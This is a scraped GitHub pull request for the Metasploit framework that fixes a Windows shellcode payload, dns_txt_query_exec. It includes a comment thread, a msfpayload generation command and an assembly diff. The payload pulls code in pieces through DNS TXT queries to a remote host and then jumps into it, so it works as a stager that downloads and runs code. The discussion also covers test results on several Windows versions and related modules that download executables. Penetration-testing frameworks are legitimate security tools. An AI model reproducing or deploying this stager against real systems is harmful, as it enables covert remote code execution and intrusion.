Skip to content


Subversion checkout URL

You can clone with
Download ZIP


Improved payload dns_txt_query_exec #1057

merged 16 commits into from

3 participants


Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at

./msfpayload windows/dns_txt_query_exec C

(you should get a messagebox)


tested on Win2003 R2 SP2 as well, works fine


Is this an extension of what we were working on in April? if so just let me know if you want the server-side delivery code


this is a bugfix to the existing module (which simply downloads payload) - the modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again & see what needs to be done to make them work reliably


Ok, sorry did't want to hijack the thread... lets chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming


what ? is it evening already ? :)


Tested ok on Windows 7 SP1.

@wchen-r7 wchen-r7 merged commit 0bf92b5 into rapid7:master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Oct 24, 2012
  1. @corelanc0d3r


    corelanc0d3r authored
Commits on Oct 29, 2012
  1. @corelanc0d3r
Commits on Oct 30, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Oct 31, 2012
  1. @corelanc0d3r
Commits on Nov 3, 2012
  1. @corelanc0d3r
Commits on Nov 6, 2012
  1. @corelanc0d3r
Commits on Nov 7, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r

    restored original file

    corelanc0d3r authored
Commits on Nov 8, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 9, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 12, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
  3. @corelanc0d3r
This page is out of date. Refresh to see the latest.
Showing with 7 additions and 7 deletions.
  1. +7 −7 modules/payloads/singles/windows/dns_txt_query_exec.rb
14 modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
pop eax ; get ptr to dnsname (lpstrName)
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
@@ -225,9 +225,9 @@ def generate
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
mov #{bufferreg},edx
Something went wrong with that request. Please try again.